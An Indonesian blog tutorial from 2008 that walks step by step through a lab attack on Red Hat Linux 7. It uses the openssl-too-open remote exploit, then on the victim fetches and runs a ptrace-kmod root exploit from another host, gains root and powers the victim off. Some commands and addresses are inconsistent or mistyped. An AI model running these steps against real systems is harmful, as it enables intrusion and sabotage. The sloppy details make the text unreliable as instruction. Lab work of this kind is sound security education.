Exploit linux RedHat 7
Tuesday, April 15th, 2008EXPLOIT PADA LINUX
REDHAT 7
Exploit adalah program penyususup yang buat untuk mencari celah keamanan pada komputer lain dan mendapatkan hak akses administrator guna menguasai komputer tersebut.
langsung saja…
Kami menggunakan
2 komputer untuk mencoba tehnik exploit,
yaitu komputer target sekaligus komputer source dan komputer penyerang (komputer source adalah komputer yang
menyediakan file – file atau source code yang diperlukan dalam tehnik penyerangan).
Kami mencoba untuk memasuki
komputer target dan mendapatkan hak akses sebagai root (aministrator).
Langkah awal yang kami lakukan
adalah mendownload file openssl-too-open.tar.gz
dari komputer source dengan mengetikkan perintah :
#wget http://192.168.10.25/kamjar/openssl-too-open.tar.gz
dimana 192.168.10.25 adalah
alamat IP dari komputer source.
Maka akan muncul tampilan yang
menyatakan download file berhasil dan akan di save ke komputer penyerang
seperti pada gambar di bawah ini :
Untuk memastikan bahwa file
openssl-too-open.tar.gz telah tersimpan maka ketikkan :
#ls –l
untuk melihat isi dari directory
home.
Setelah file
openssl-too-open.tar.gz sudah tersimpan di directory home, extrak file
tersebut.
Akan tetapi sebelum file tersebut
di extrak, ubah hak aksesnya sehingga memiliki hak untuk executable dengan
perintah :
#chmod +x openssl-too-open.tar.gz
Dan ketik :
#ls –l
untuk melihat file tersebut dan
pastikan memiliki hak akses untuk executable.
Extrak file tersebut dengan
perintah :
#tar –zxvf openssl-too-open.tar.gz
Setelah file openssl-too-open
terextrak masuk ke directory openssl-too-open dengan perintah :
#cd openssl-too-open
Setelah masuk ke directory
openssl-too-open, lihat isi dari directory tersebut dengan perintah :
#ls –l
Langkah selanjutnya adalah
melakukan scanning pada komputer target dengan perintah :
#./openssl-scanner –C 192.168.10.25
Maka secara otomatis komputera
akan melakukan scanning 1 subnet pada kelas C
Setelah proses scanning selesai
kita gunakan telnet untuk bisa masuk ke komputer target, kita ketik perintah :
#telnet 192.168.10.25 80 (masuk ke komputer dengan IP 192.168.10.25
melalui port 80 (http))
Komputer akan mencoba masuk ke
komputer korban melalui port 80.
Untuk mengetahui informasi dari
web server komputer korban kita dapat ketikkan :
#GET / HTTP 1.0 /.
Maka akanmuncul tampilan yang
berisikan informasi dari apache server (informasi web server) komputer korban.
Setelah informasi didapat maka
jalankan openssl-too-open dengan parameter dari web server :
#./openssl-too-open –a 0×0b –v 192.168.10.25
Maka akan muncul warning (peringatan),
yang merupakan tanda kita telah masuk ke web server sebagai user dimana user
disini adalah apache.
Untuk mengecek user yang kita
akses maka ketik perintah :
#whoami
Maka kita akan melihat status
kita sebagai apache (user biasa).
Langkah berikutnta adalah masuk
ke direktory tmp, karena di direktory inilah kita dapat merubah hak akses
menjadi root :
#cd /tmp
Setelah itu download file
ptrace-kmod.c dari komputer source lagi dengan perintah :
#wget http://192.168.10.25/kamjar/ptrace-kmod.c
Setelah download selesai untuk
memastikan hasil download benar ketik #ls
–l untuk melihat isi data dari direktory kerja.
Setelah itu eksekusi file
pteace-kmod.c dengan perintah :
#gcc ptrace-kmod
Dari hasil eksekusi file
ptrace-kmod.c maka akanmenghasilkan file a.out
File a.out inilah yang digunakan
untuk merubah hak akses menjadi root
Kita tidak harus mengeksekusi
file ptrace-kmod.c untuk mendapatkan file a.out ini, kita dapat langsung
mendownload file a.out ini sebagai kompiler untuk masuk ke hak akses root,
dengan catatan komputer soure telah melakukan eksekusi pada file ptrace-kmod.c.
dengan perintah :
#wget http://192.168.10.25/kamjar/a.out
Lihat data di direktory tmp #ls –l untuk melihat apakah file a.out
ada.
Ubah file permission a.out
tersebut sehingga memiliki hak executable:
#chmod +x a.out
Setelah hak akses dirubah,
eksekusi file ini dengan perintah :
#./a.out
Setelah file tereksekusi maka
kita telah memiliki hak akses root di komputer korban.
Kita cek keberadaan kita dengan
perintah :
#whoami
Maka akan muncul root, sebagai
tanda kita telah berhasil menjadi root di komputer korban
Untuk uji coba kami akan
menmatikan komputer korban, yaitu dengan perintah :
#poweroff
Maka komputer kita akan menerima
pesan warning sebagai tanda komputer korban telah mati.
Wassalam…
